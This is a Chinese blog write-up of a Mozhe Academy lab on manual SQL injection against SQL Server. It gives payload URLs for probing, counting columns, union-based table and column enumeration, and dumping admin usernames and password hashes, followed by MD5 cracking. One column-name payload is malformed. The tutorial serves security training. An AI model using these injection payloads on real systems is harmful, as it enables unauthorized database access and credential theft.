SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))

最新推荐文章于 2024-06-01 15:00:55 发布
最新推荐文章于 2024-06-01 15:00:55 发布
阅读量1.2k 收藏 5
点赞数 1
分类专栏: SQL注入 文章标签: 数据库 sqlserver 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52635170/article/details/126729236
版权

        本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库)。

        地址:http://219.153.49.228:42295/new_list.asp?id=2(注意地址已失效仅供参考)

首先第一步,看是否存在注入点。

构造Payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2

        回显报错,说明“and 1=2”语句拼接到了后端数据库查询语句当中。

        接下来我们就开始猜解后端收据库能够返回多少个字段

        使用order by构造Payload “http://219.153.49.228:42295/new_list.asp?id=1 order by 4”

http://219.153.49.228:42295/new_list.asp?id=1 order by 4

        Order by是数据库查询的时候对结果进行的排序,如果后面写的是字段,则根据查询字段进行排序,但如果后面写的是数字,该数字大于所查询的字段数,则就会报错,小于的话就不会报错。

        发现order by 5的时候没有数据回显,order by 4 有回显数据,所以后端返回到前端的数据字段数为4个。

        下面就要开始检测这4个字段当中哪些字段可以被前端显示出来。

      使用union 查询来构造Payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select 'null',null,null,null”通过前端页面是否显示null字符来判断第一个字段为回显数据字段。

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select 'null',null,null,null

 

 

        通过测试发现只有第二第三个字段是前端回显数据字段。

        这样我们就可以在这两个字段当中来查询我们想要的得到的数据。

  例如得到当前数据库名称(db_name())和当前用户(user,system_user,current_user),@@SERVERNAME获取服务器主机信息以及数据库的版本(@@version)。

        接下来咱们就开始爆表名。

        构造payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null

        其中sysobjects系统对象表,保存当前数据库的对象。Xtype='u' 代表查询表的操作。

        如果希望爆出其余的表即可以构造payload “http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null”

        直接name not in ('已经爆出的表名')

“http://219.153.49.228:42295/new_list.asp?id=2 and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

        大家还可以在name not in ('已爆出的表名1','已爆出的表名2') 小括号里添加更多已经爆出的表名,这里就不再尝试。

        爆出表名就可以继续爆出字段名了 。

        构造Payload:“http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

        其中object_id代表要查询字段的表名,数字1为第一列的字段,以次类推,直到查询不到字段名位置。

         这里咱们直接从第二列字段名和第三列字段名知道了字段名有username,password。剩下的就交给小伙伴们自己去尝试吧!

        接下来咱们就通过爆出的字段名来查询数据信息。

        构造Payload:“http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select null,username,password,null from manage”

http://219.153.49.228:42295/new_list.asp?id=2 and 1=2 union all select null,username,password,null from manage

 

        这样最终我们就可以获得数据了,将密码进行MD5解密(md5在线解密破解,md5解密加密),返回登录页进行登录,划倒页面最下端就可以看到KEY了。 

你们de4月天
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2248
sql手工注入封神台靶场
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1060
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
SQL Server注入
最新发布
余十步的博客
06-01 604
原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)也可以通过定义十六进制的SQL语句,使用exec函数执行。语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)
sqlserver注入
hellodaoyan的博客
12-11 219
管理员账号叫 sa 允许外网链接 可以爆破8可以打开3 3不能打开8直接备份和删除很麻烦 需要先分离在这个目录sa账号能不用就不用。
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2466
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入网站后台登录绕过(墨者靶场)
FreyZzz的博客
10-13 2252
靶场地址:SQL注入漏洞测试(登录绕过)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 通过网站URL地址判断不存在id=x等可传参数,此网站不采用GET方式传参。 brup抓包 由此可判断为POST传参 ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
web安全学习-sql注入-针对mssql(sqlserver)的攻击
Shanfenglan's blog
03-26 1277
文章目录0x00 前言0x01 mssql环境下需要了解的几个特性1. iis特性1.1 %特性(ASP+IIS)1.2 %u特性(asp+iis和aspx+iis)1.3 另类%u特性(ASP+IIS)2. mssql特性1. 空白字符2. 注释符3. 特殊数值4. 运算符0x02 测试过程0x03 自动化生成bypass_payload脚本编写总结参考文章 0x00 前言 mssql一般的环境是iis+asp或iis+aspx,我们先了解一下mssql的特性。 0x01 mssql环境下需要了解的几个
SQL注入测试平台 SQLol -2.SELECT注入测试
Galaxy_0的博客
01-13 118
SQL注入测试平台 SQLol -2.SELECT注入测试
Sql Server 手工注入总结(显错模式)
桦少's blog
01-31 939
--显错模式总结,利用类型转换报错。 --1=convert(int,(@@version)) --1=convert(int,(select host_name())) --and 1=convert(int,(user)) --爆表名记录条数。replace(字段名,' ','') select replace(str(count(*))+'N',' ','') from sys
sqlserver注入测试
weixin_48776804的博客
07-24 272
sqlserver注入测试
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2585
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
SQL注入测试
u012114090的博客
07-16 5075
(一)SQL注入简介 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串, 最终达到欺骗服务器执行恶意的SQL命令。 SQL注入是怎么产生的? 1)WEB开发人员无法保证所有的输入都已经过滤 2)攻击者利用发送给SQL服务器的输入参数构造可执行的SQL代码(可加入到get请求、post请求、http头信息、cookie中) )数据库未做相应的安全配...
墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
多崎巡礼的博客
09-28 2677
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值